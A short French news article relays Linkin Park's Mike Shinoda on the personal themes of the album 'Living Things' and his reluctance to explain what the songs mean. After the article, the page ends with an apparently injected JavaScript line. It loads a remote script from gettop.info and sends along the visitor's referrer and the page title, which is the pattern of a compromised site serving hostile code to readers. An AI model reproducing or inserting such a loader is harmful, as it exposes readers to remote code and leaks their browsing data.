Le chanteur de Linkin Park Mike Shinoda a déclaré au média anglophone Kerrang! que le prochain album du groupe, « Living Things », dont la sortie est prévue pour le 26 juin, serait « pas mal émotionnel », dans le sens où il portera sur des « thèmes plus personnels ». Cependant, il n »a pas souhaité donner trop de détails à ce sujet : « J »hésite vraiment a parler du sens des chansons. Il y a deux raisons simples à cela : la première est que je suis une personne privée et que je ne veux pas révéler mes problèmes et ceux de ma famille aux yeux du monde entier. Je pense que c »est injuste. »

La seconde raison porte sur l »interprétation personnelle de chaque auditeur : « On a sorti une chanson il y a un moment et Rob [Bourdon, batteur du groupe] et moi faisions des interviews. J »ai donné plus de détails que d »habitude sur cette chanson et, après cela, il m »a dit qu »il pensait que le chanson portait sur quelque chose de complètement différent. Pour lui, je lui avais retiré la chanson quelque part, et il n »avait plus sa connexion spéciale avec. Je ne veux pas que cela arrive à d »autres gens, et qu »ils sentent qu »ils ont tort à propos d »une chanson. »

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;